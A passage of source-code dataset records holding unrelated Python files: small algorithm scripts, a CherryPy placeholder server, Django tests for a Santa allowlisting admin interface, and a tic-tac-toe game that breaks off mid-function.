maxLen1 = 1\r\n \r\n # print(1)\r\n # continue\r\n\r\n if D in distLook:\r\n for ele in distLook[D]:\r\n\r\n if ele[0] + ele[1] < L: continue\r\n if ele[0] > R - maxLen1: break\r\n\r\n maxLen1 = max(maxLen1, min(ele[1] - (L - ele[0]), ele[1], R - ele[0] + 1, 1 + (R - L)))\r\n\r\n maxLen2 = 1\r\n curr = 1\r\n \r\n for x1, x2 in zip(A[L - 1:R - 1], A[L:R]):\r\n if x2 - x1 == D:\r\n curr += 1\r\n maxLen2 = max(maxLen2, curr)\r\n else:\r\n curr = 1\r\n if maxLen1 != maxLen2:\r\n print(L, R, D, maxLen1, maxLen2)\r\n\r\n\"\"\"\r\n8 11 21 26 32 42 48 53 55 57\r\n\r\n3 9 2\r\n0 9 2\r\n\r\n\r\n\r\n\r\n\"\"\"","sub_path":"october circuits/arithprogTest.py","file_name":"arithprogTest.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"269942695","text":"import cherrypy\nimport random\nimport time\nimport os\nimport redis\nimport json\nimport uuid\nimport subprocess\n\nredis = redis.Redis()\n\nindex_html = \"\"\"\n\n\n\nMusicazoo WIP\n\n\n\n

    Musicazoo

    \nMusicazoo has been disabled until the end of the party.\n\n\n\"\"\"\n\nclass Musicazoo:\n\t@cherrypy.expose\n\tdef index(self):\n\t\treturn index_html\n\ncherrypy.config.update({'server.socket_port': 8080})\n\ncherrypy.tree.mount(Musicazoo(), os.getenv(\"MZ_LOCATION\") or \"/\")\n\ncherrypy.engine.start()\ncherrypy.engine.block()\n","sub_path":"nopeserver.py","file_name":"nopeserver.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"619382378","text":"import random as rand\nimport gcd\n\n\ndef stress_test(n_input):\n while 1:\n rand.seed(version=2)\n a = rand.randrange(1, n_input)\n b = rand.randrange(1, n_input)\n result1 = gcd.gcd_naive(a, b)\n result2 = gcd.gcd_euclid(a, b)\n if result1 == result2:\n print(\"OK\")\n else:\n print(\"Wrong answer \", result1, result2)\n return\n\n\nif __name__ == \"__main__\":\n N = 50\n print(stress_test(N))\n","sub_path":"Week2/greatest_common_divisor/stress_test_gcd.py","file_name":"stress_test_gcd.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597362684","text":"#\r\n# @lc app=leetcode.cn id=1329 lang=python3\r\n#\r\n# [1329] 将矩阵按对角线排序\r\n#\r\n# https://leetcode-cn.com/problems/sort-the-matrix-diagonally/description/\r\n#\r\n# algorithms\r\n# Medium (63.09%)\r\n# Likes: 0\r\n# Dislikes: 0\r\n# Total Accepted: 348\r\n# Total Submissions: 551\r\n# Testcase Example: '[[3,3,1,1],[2,2,1,2],[1,1,1,2]]'\r\n#\r\n# 给你一个 m * n 的整数矩阵 mat ,请你将同一条对角线上的元素(从左上到右下)按升序排序后,返回排好序的矩阵。\r\n#\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n#\r\n# 输入:mat = [[3,3,1,1],[2,2,1,2],[1,1,1,2]]\r\n# 输出:[[1,1,1,1],[1,2,2,2],[1,2,3,3]]\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# m == mat.length\r\n# n == mat[i].length\r\n# 1 <= m, n <= 100\r\n# 1 <= mat[i][j] <= 100\r\n#\r\n#\r\n#\r\n\r\n\r\n# @lc code=start\r\nclass Solution:\r\n def diagonalSort(self, mat: List[List[int]]) -> List[List[int]]:\r\n # 遍历开头一行和一列作为start, 排序对应的对角线然后重新填充\r\n rows, cols = len(mat), len(mat[0])\r\n for c in range(cols):\r\n cur = []\r\n for le in range(min(cols - c, rows)):\r\n cur.append(mat[le][c + le])\r\n cur = sorted(cur)\r\n i = 0\r\n for le in range(min(cols - c, rows)):\r\n mat[le][c + le] = cur[i]\r\n i += 1\r\n for r in range(1, rows):\r\n cur = []\r\n for le in range(min(cols, rows - r)):\r\n cur.append(mat[r + le][le])\r\n cur = sorted(cur)\r\n i = 0\r\n for le in range(min(cols, rows - r)):\r\n mat[r + le][le] = cur[i]\r\n i += 1\r\n return mat\r\n\r\n\r\n# @lc code=end\r\n","sub_path":"Medium/1329.将矩阵按对角线排序.py","file_name":"1329.将矩阵按对角线排序.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334497583","text":"from django.test import TestCase\nfrom mail.models import Mail\nimport unittest\n\n\nclass MailTestCase(unittest.TestCase):\n def setUp(self):\n for _ in range(400):\n Mail.objects.create(name='Test', email='Test@test.com', message_text='This is a test message')\n Mail.objects.create(name='Test.', email='Test@test.ru', message_text='This is a test message...')\n\n def test_email(self):\n email_1 = Mail.objects.get(email='Test@test.ru')\n email_2 = Mail.objects.get(email='Test@test.com')\n self.assertEquals(email_1, 'Test@test.ru')\n self.assertEquals(email_2, 'Test@test.com')\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"mail_form/mail_form/mail/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633889221","text":"import datetime\nfrom functools import reduce\nimport json\nimport operator\nimport plistlib\nfrom django.contrib.auth.models import Group, Permission\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.utils.crypto import get_random_string\nfrom zentral.contrib.inventory.models import MetaBusinessUnit, File\nfrom accounts.models import User\nfrom zentral.contrib.santa.models import Bundle, Rule, Target\n\n\ndef get_random_sha256():\n return get_random_string(64, \"abcdef0123456789\")\n\n\n@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')\nclass SantaSetupViewsTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # user\n cls.pwd = \"godzillapwd\"\n cls.user = User.objects.create_user(\"godzilla\", \"godzilla@zentral.io\", cls.pwd)\n cls.group = Group.objects.create(name=get_random_string())\n cls.user.groups.set([cls.group])\n # file tree\n cls.file_sha256 = get_random_sha256()\n cls.file_name = get_random_string()\n cls.file_bundle_name = get_random_string()\n cls.file_cert_sha256 = get_random_sha256()\n cls.file_cert_cn = get_random_string()\n cls.file_cert_ou = get_random_string()\n cls.file, _ = File.objects.commit({\n 'source': {'module': 'zentral.contrib.santa', 'name': 'Santa events'},\n 'bundle': {'bundle_id': 'servicecontroller:com.apple.stomp.transcoderx',\n 'bundle_name': cls.file_bundle_name,\n 'bundle_version': '3.5.3',\n 'bundle_version_str': '3.5.3'},\n 'bundle_path': ('/Library/Frameworks/Compressor.framework/'\n 'Versions/A/Resources/CompressorTranscoderX.bundle'),\n 'name': cls.file_name,\n 'path': ('/Library/Frameworks/Compressor.framework/'\n 'Versions/A/Resources/CompressorTranscoderX.bundle/Contents/MacOS'),\n 'sha_256': cls.file_sha256,\n 'signed_by': {\n 'common_name': cls.file_cert_cn,\n 'organization': 'Apple Inc.',\n 'organizational_unit': cls.file_cert_ou,\n 'sha_256': cls.file_cert_sha256,\n 'valid_from': datetime.datetime(2007, 2, 23, 22, 2, 56),\n 'valid_until': datetime.datetime(2015, 1, 14, 22, 2, 56),\n 'signed_by': {\n 'common_name': 'Apple Code Signing Certification Authority',\n 'organization': 'Apple Inc.',\n 'organizational_unit': 'Apple Certification Authority',\n 'sha_256': '3afa0bf5027fd0532f436b39363a680aefd6baf7bf6a4f97f17be2937b84b150',\n 'valid_from': datetime.datetime(2007, 2, 14, 21, 19, 19),\n 'valid_until': datetime.datetime(2015, 2, 14, 21, 19, 19),\n 'signed_by': {\n 'common_name': 'Apple Root CA',\n 'organization': 'Apple Inc.',\n 'organizational_unit': 'Apple Certification Authority',\n 'sha_256': 'b0b1730ecbc7ff4505142c49f1295e6eda6bcaed7e2c68c5be91b5a11001f024',\n 'valid_from': datetime.datetime(2006, 4, 25, 21, 40, 36),\n 'valid_until': datetime.datetime(2035, 2, 9, 21, 40, 36),\n },\n },\n }\n })\n cls.file_target = Target.objects.create(type=Target.BINARY, sha256=cls.file_sha256)\n\n def login_redirect(self, url):\n response = self.client.get(url)\n self.assertRedirects(response, \"{u}?next={n}\".format(u=reverse(\"login\"), n=url))\n\n def login(self, *permissions):\n if permissions:\n permission_filter = reduce(operator.or_, (\n Q(content_type__app_label=app_label, codename=codename)\n for app_label, codename in (\n permission.split(\".\")\n for 
permission in permissions\n )\n ))\n self.group.permissions.set(list(Permission.objects.filter(permission_filter)))\n else:\n self.group.permissions.clear()\n self.client.force_login(self.user)\n\n def post_as_json(self, url_name, data):\n return self.client.post(reverse(\"santa:{}\".format(url_name)),\n json.dumps(data),\n content_type=\"application/json\")\n\n def test_configurations_redirect(self):\n self.login_redirect(reverse(\"santa:configuration_list\"))\n self.login_redirect(reverse(\"santa:create_configuration\"))\n\n def test_get_create_configuration_view(self):\n self.login()\n response = self.client.get(reverse(\"santa:create_configuration\"))\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\")\n response = self.client.get(reverse(\"santa:create_configuration\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/configuration_form.html\")\n self.assertContains(response, \"Santa configuration\")\n\n def create_configuration(self):\n response = self.client.post(reverse(\"santa:create_configuration\"),\n {\"name\": get_random_string(64),\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"enable_sysx_cache\": \"on\",\n \"mode_notification_lockdown\": \"lockdown\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 602,\n }, follow=True)\n configuration = response.context[\"object\"]\n return response, configuration\n\n def test_post_create_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n response, configuration = self.create_configuration()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(configuration.enable_sysx_cache, True)\n self.assertEqual(configuration.full_sync_interval, 602)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertContains(response, configuration.name)\n\n def test_post_update_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.post(reverse(\"santa:update_configuration\", args=(configuration.pk,)),\n {\"name\": configuration.name,\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"mode_notification_lockdown\": \"new lockdown message\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 603,\n }, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.change_configuration\", \"santa.view_configuration\")\n response = self.client.post(reverse(\"santa:update_configuration\", args=(configuration.pk,)),\n {\"name\": configuration.name,\n \"batch_size\": 50,\n \"client_mode\": \"1\",\n \"banned_block_message\": \"yo\",\n \"enable_page_zero_protection\": \"on\",\n \"mode_notification_lockdown\": \"new lockdown message\",\n \"mode_notification_monitor\": \"monitor\",\n \"unknown_block_message\": \"block\",\n \"full_sync_interval\": 603,\n }, follow=True)\n configuration = response.context[\"object\"]\n self.assertEqual(configuration.enable_sysx_cache, False)\n self.assertEqual(configuration.full_sync_interval, 603)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertContains(response, \"new lockdown message\")\n\n 
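    # --- Illustrative sketch, not part of the original suite ---
    # login(*permissions) above resolves "app_label.codename" strings into
    # Permission rows via a single OR-ed Q filter. The standalone helper
    # below shows the same resolution one name at a time: simpler to read,
    # but one query per permission instead of one filtered query overall.
    def _resolve_permissions_sketch(self, *names):
        perms = []
        for name in names:
            # e.g. "santa.add_rule" -> ("santa", "add_rule"); the
            # content_type filter is needed because codenames are only
            # unique per app, not globally.
            app_label, codename = name.split(".", 1)
            perms.append(Permission.objects.get(
                content_type__app_label=app_label, codename=codename))
        return perms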
def test_get_create_enrollment_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response = self.client.get(reverse(\"santa:create_enrollment\", args=(configuration.pk,)))\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.view_configuration\", \"santa.add_enrollment\")\n response = self.client.get(reverse(\"santa:create_enrollment\", args=(configuration.pk,)))\n self.assertTemplateUsed(response, \"santa/enrollment_form.html\")\n self.assertContains(response, \"Create enrollment\")\n self.assertContains(response, configuration.name)\n\n def create_enrollment(self, configuration, no_assertions=False):\n mbu = MetaBusinessUnit.objects.create(name=\"{} MBU\".format(configuration.name))\n mbu.create_enrollment_business_unit()\n response = self.client.post(reverse(\"santa:create_enrollment\", args=(configuration.pk,)),\n {\"secret-meta_business_unit\": mbu.pk,\n \"configuration\": configuration.pk,\n \"santa_release\": \"\"}, follow=True)\n if no_assertions:\n return response, None\n enrollment = response.context[\"enrollments\"][0]\n self.assertEqual(enrollment.version, 1)\n return response, enrollment\n\n def test_post_create_enrollment_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n response, enrollment = self.create_enrollment(configuration, no_assertions=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_configuration\", \"santa.view_configuration\", \"santa.add_enrollment\")\n response, enrollment = self.create_enrollment(configuration)\n self.assertTemplateUsed(response, \"santa/configuration_detail.html\")\n self.assertEqual(response.context[\"object\"], configuration)\n # response does not contain enrollment secret meta business unit name\n self.assertNotContains(response, enrollment.secret.meta_business_unit.name)\n # response does not contain link to download enrollment configuration plist\n self.assertNotContains(response, reverse(\"santa:enrollment_configuration_plist\",\n args=(configuration.pk, enrollment.pk)))\n # response does not contain link to download enrollment configuration profile\n self.assertNotContains(response, reverse(\"santa:enrollment_configuration_profile\",\n args=(configuration.pk, enrollment.pk)))\n self.login(\"santa.view_configuration\", \"santa.view_enrollment\")\n response = self.client.get(configuration.get_absolute_url())\n # response contains enrollment secret meta business unit name\n self.assertContains(response, enrollment.secret.meta_business_unit.name)\n # response contains link to download enrollment configuration plist\n self.assertContains(response, reverse(\"santa:enrollment_configuration_plist\",\n args=(configuration.pk, enrollment.pk)))\n # response contains link to download enrollment configuration profile\n self.assertContains(response, reverse(\"santa:enrollment_configuration_profile\",\n args=(configuration.pk, enrollment.pk)))\n\n def test_enrollment_configuration_view(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_enrollment\", \"santa.view_enrollment\")\n _, configuration = self.create_configuration()\n _, enrollment = self.create_enrollment(configuration)\n self.client.logout()\n enrollment_configuration_plist_url = reverse(\n \"santa:enrollment_configuration_plist\", args=(configuration.pk, enrollment.pk)\n )\n 
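        # Expected access ladder for the enrollment downloads: anonymous
        # requests redirect to login, authenticated users without
        # "santa.view_enrollment" get a 403, and only that permission
        # unlocks the plist/profile responses checked below.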
self.login_redirect(enrollment_configuration_plist_url)\n enrollment_configuration_profile_url = reverse(\n \"santa:enrollment_configuration_profile\", args=(configuration.pk, enrollment.pk)\n )\n self.login_redirect(enrollment_configuration_profile_url)\n self.login()\n response = self.client.get(enrollment_configuration_plist_url)\n self.assertEqual(response.status_code, 403)\n response = self.client.get(enrollment_configuration_profile_url)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.view_enrollment\")\n response = self.client.get(enrollment_configuration_plist_url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['Content-Type'], \"application/x-plist\")\n plist_config = plistlib.loads(response.content)\n self.assertTrue(plist_config[\"SyncBaseURL\"].endswith(\n f\"/santa/sync/{enrollment.secret.secret}/\"\n ))\n self.assertEqual(plist_config[\"EnableSysxCache\"], configuration.enable_sysx_cache)\n response = self.client.get(enrollment_configuration_profile_url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['Content-Type'], \"application/octet-stream\")\n\n def test_configuration_rules_redirects(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n self.client.logout()\n self.login_redirect(reverse(\"santa:configuration_rules\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)))\n self.login_redirect(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)))\n\n def test_configuration_rules_permission_denied(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n for view_name in (\"configuration_rules\", \"create_configuration_rule\",\n \"pick_rule_binary\", \"pick_rule_bundle\", \"pick_rule_certificate\"):\n response = self.client.get(reverse(f\"santa:{view_name}\", args=(configuration.pk,)))\n self.assertEqual(response.status_code, 403)\n\n def test_create_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.add_rule\", \"santa.view_rule\")\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n rule = response.context[\"object_list\"][0]\n self.assertEqual(rule.configuration, configuration)\n self.assertEqual(rule.target.sha256, binary_hash)\n self.assertEqual(rule.target.type, Target.BINARY)\n self.assertEqual(rule.policy, Rule.ALLOWLIST)\n self.assertEqual(rule.custom_msg, \"\")\n self.assertEqual(rule.serial_numbers, [])\n self.assertEqual(rule.primary_users, [])\n\n def test_create_conflict_configuration_rule(self):\n 
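        # A second rule for an already-ruled target must be rejected at the
        # form level: the view re-renders rule_form.html with the
        # "A rule for this target already exists" non-field error instead
        # of persisting a conflicting Rule.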
self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n # conflict\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST}, follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"santa/rule_form.html\")\n form = response.context[\"form\"]\n self.assertEqual(form.errors, {'__all__': ['A rule for this target already exists']})\n\n def test_update_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n rule = response.context[\"object_list\"][0]\n # update\n custom_message = get_random_string()\n serial_numbers = [get_random_string() for i in range(3)]\n primary_users = [get_random_string() for i in range(12)]\n response = self.client.post(reverse(\"santa:update_configuration_rule\", args=(configuration.pk, rule.pk)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST,\n \"custom_msg\": custom_message,\n \"serial_numbers\": \", \".join(serial_numbers),\n \"primary_users\": \",\".join(primary_users)}, follow=True)\n self.assertEqual(response.status_code, 403)\n self.login(\"santa.change_rule\", \"santa.view_rule\")\n response = self.client.post(reverse(\"santa:update_configuration_rule\", args=(configuration.pk, rule.pk)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.BLOCKLIST,\n \"custom_msg\": custom_message,\n \"serial_numbers\": \", \".join(serial_numbers),\n \"primary_users\": \",\".join(primary_users)}, follow=True)\n self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n rule = response.context[\"object_list\"][0]\n self.assertEqual(rule.configuration, configuration)\n self.assertEqual(rule.target.sha256, binary_hash)\n self.assertEqual(rule.target.type, Target.BINARY)\n self.assertEqual(rule.policy, Rule.BLOCKLIST)\n self.assertEqual(rule.custom_msg, custom_message)\n self.assertEqual(rule.serial_numbers, serial_numbers)\n self.assertEqual(rule.primary_users, primary_users)\n\n def test_delete_configuration_rule(self):\n self.login(\"santa.add_configuration\", \"santa.view_configuration\",\n \"santa.add_rule\", \"santa.view_rule\")\n _, configuration = self.create_configuration()\n # create\n binary_hash = get_random_sha256()\n response = self.client.post(reverse(\"santa:create_configuration_rule\", args=(configuration.pk,)),\n {\"target_type\": Target.BINARY,\n \"target_sha256\": binary_hash,\n \"policy\": Rule.ALLOWLIST}, follow=True)\n rule = response.context[\"object_list\"][0]\n # delete GET\n response = self.client.get(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)))\n self.assertEqual(response.status_code, 403)\n 
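        # Re-login with "santa.delete_rule": the same GET now renders the
        # confirmation page, and the follow-up POST actually removes the
        # rule from the configuration.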
self.login(\"santa.delete_rule\", \"santa.view_rule\")\n        response = self.client.get(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)))\n        self.assertTemplateUsed(response, \"santa/rule_confirm_delete.html\")\n        self.assertContains(response, binary_hash)\n        # delete POST\n        response = self.client.post(reverse(\"santa:delete_configuration_rule\", args=(configuration.pk, rule.pk)),\n                                    follow=True)\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"santa/configuration_rules.html\")\n        self.assertFalse(any(rule.target.sha256 == binary_hash for rule in response.context[\"object_list\"]))\n\n    def test_pick_rule_binary(self):\n        self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n        _, configuration = self.create_configuration()\n        response = self.client.get(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)),\n                                   {\"name\": self.file_name})\n        self.assertEqual(response.status_code, 403)\n        self.login(\"santa.add_rule\")\n        response = self.client.get(reverse(\"santa:pick_rule_binary\", args=(configuration.pk,)),\n                                   {\"name\": self.file_name})\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"santa/pick_rule_binary.html\")\n        binaries = response.context[\"binaries\"]\n        self.assertEqual(binaries, [(self.file, None)])\n        self.assertContains(response, self.file.sha_256)\n\n    def test_pick_rule_bundle(self):\n        self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n        _, configuration = self.create_configuration()\n        bundle_target = Target.objects.create(type=Target.BUNDLE, sha256=get_random_sha256())\n        bundle = Bundle.objects.create(\n            target=bundle_target,\n            path=get_random_string(),\n            executable_rel_path=get_random_string(),\n            bundle_id=self.file.bundle.bundle_id,\n            name=self.file_bundle_name,\n            version=self.file.bundle.bundle_version,\n            version_str=self.file.bundle.bundle_version_str,\n            binary_count=1\n        )\n        # 403\n        response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n                                   {\"name\": self.file_bundle_name})\n        self.assertEqual(response.status_code, 403)\n        self.login(\"santa.add_rule\")\n        # bundle not ready, no go\n        response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n                                   {\"name\": self.file_bundle_name})\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"santa/pick_rule_bundle.html\")\n        self.assertEqual(response.context[\"bundles\"], [(bundle, None)])\n        self.assertContains(response, \"Bundle not uploaded yet\")\n        self.assertNotContains(response, \"Create rule\")\n        # bundle ready, OK\n        bundle.binary_targets.add(self.file_target)\n        bundle.uploaded_at = datetime.datetime.now()\n        bundle.save()\n        response = self.client.get(reverse(\"santa:pick_rule_bundle\", args=(configuration.pk,)),\n                                   {\"name\": self.file_bundle_name})\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"santa/pick_rule_bundle.html\")\n        self.assertEqual(response.context[\"bundles\"], [(bundle, None)])\n        self.assertNotContains(response, \"Bundle not uploaded yet\")\n        self.assertContains(response, \"Create rule\")\n\n    def test_pick_rule_certificate(self):\n        self.login(\"santa.add_configuration\", \"santa.view_configuration\")\n        _, configuration = self.create_configuration()\n        response = self.client.get(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)),\n                                   {\"query\": self.file_cert_ou})\n        self.assertEqual(response.status_code, 403)\n        self.login(\"santa.add_rule\")\n        response = 
self.client.get(reverse(\"santa:pick_rule_certificate\", args=(configuration.pk,)),\n                                   {\"query\": self.file_cert_ou})\n        self.assertEqual(response.status_code, 200)\n        self.assertTemplateUsed(response, \"santa/pick_rule_certificate.html\")\n        certificates = response.context[\"certificates\"]\n        self.assertEqual(certificates, [(self.file.signed_by, None)])\n","sub_path":"tests/santa/test_setup_views.py","file_name":"test_setup_views.py","file_ext":"py","file_size_in_byte":25984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"417087172","text":"board=[\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\"]\r\n\r\ngame_active = True\r\nwinner = None\r\ncurrent = \"X\"\r\nplayer1=\"\"\r\nplayer2=\"\"\r\n\r\n\r\ndef display_board():\r\n    print(\" | \", board[0], \" | \", board[1], \" | \", board[2], \" | \")\r\n    print(\" | \", board[3], \" | \", board[4], \" | \", board[5], \" | \")\r\n    print(\" | \", board[6], \" | \", board[7], \" | \", board[8], \" | \")\r\n\r\ndef play_game():\r\n\r\n    print(\"Welcome to Tic Tac Toe...\")\r\n    print(\"Please enter your names : \")\r\n    get_players()\r\n\r\n    display_board()\r\n\r\n    while game_active:\r\n\r\n        handle_turn(current)\r\n\r\n        check_game_over()\r\n\r\n        change_player()\r\n\r\n\r\n    if (winner==\"X\"):\r\n        print(\"Winner : \", player1)\r\n    elif(winner==\"O\"):\r\n        print(\"Winner : \", player2)\r\n    elif winner==None:\r\n        print(\"Tie\")\r\n\r\n\r\n\r\ndef handle_turn(current):\r\n    valid=False\r\n\r\n    position = input(\"Enter position from 1-9 : \")\r\n\r\n    while not valid:\r\n        while position not in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",]:\r\n            position = input(\"Invalid input. Enter valid position from 1-9 : \")\r\n\r\n        position = int(position)-1\r\n\r\n        if board[position]==\"-\":\r\n            valid=True\r\n\r\n\r\n        else:\r\n            print(\"Position already taken. Enter an empty space: \")\r\n\r\n    board[position] = current\r\n    display_board()\r\n\r\ndef check_game_over():\r\n    \r\n    check_win()\r\n\r\n    check_tie()\r\n\r\n\r\n\r\ndef check_win():\r\n\r\n    global winner\r\n\r\n    row_winner=check_rows()\r\n\r\n    column_winner=check_columns()\r\n\r\n    diagonal_winner=check_diagonals()\r\n\r\n    if row_winner:\r\n        winner=row_winner\r\n\r\n    elif column_winner:\r\n        winner=column_winner\r\n\r\n    elif diagonal_winner:\r\n        winner=diagonal_winner\r\n\r\n    else:\r\n        winner=None\r\n\r\n    return\r\n\r\ndef check_rows():\r\n\r\n    global game_active\r\n\r\n    row_1 = board[0] == board[1] == board[2] != \"-\"\r\n    row_2 = board[3] == board[4] == board[5] != \"-\"\r\n    row_3 = board[6] == board[7] == board[8] != \"-\"\r\n\r\n    if row_1 or row_2 or row_3:\r\n        game_active=False\r\n\r\n    if row_1:\r\n        return board[0]\r\n\r\n    elif row_2:\r\n        return board[3]\r\n\r\n    elif row_3:\r\n        return board[6]\r\n\r\n    return\r\n\r\ndef check_columns():\r\n    global game_active\r\n\r\n    column_1 = board[0] == board[3] == board[6] != \"-\"\r\n    column_2 = board[1] == board[4] == board[7] != \"-\"\r\n    column_3 = board[2] == board[5] == board[8] != \"-\"\r\n\r\n    if column_1 or column_2 or column_3:\r\n        game_active = False\r\n\r\n    if column_1:\r\n        return board[0]\r\n\r\n    elif column_2:\r\n        return board[1]\r\n\r\n    elif column_3:\r\n        return board[2]\r\n\r\n    return\r\n\r\ndef check_diagonals():\r\n    global game_active\r\n\r\n    diagonal_1 = board[0] == board[4] == board[8] != \"-\"\r\n    diagonal_2 = board[2] == board[4] == board[6] != \"-\"\r\n\r\n    if diagonal_1 or diagonal_2 :\r\n        game_active = False\r\n\r\n    if diagonal_1:\r\n        return board[0]\r\n\r\n    elif diagonal_2:\r\n        
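# board[2] lies on the anti-diagonal (cells 2, 4, 6); all three hold the\r\n        # same mark when diagonal_2 is True, so the corner carries the winner\r\n        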
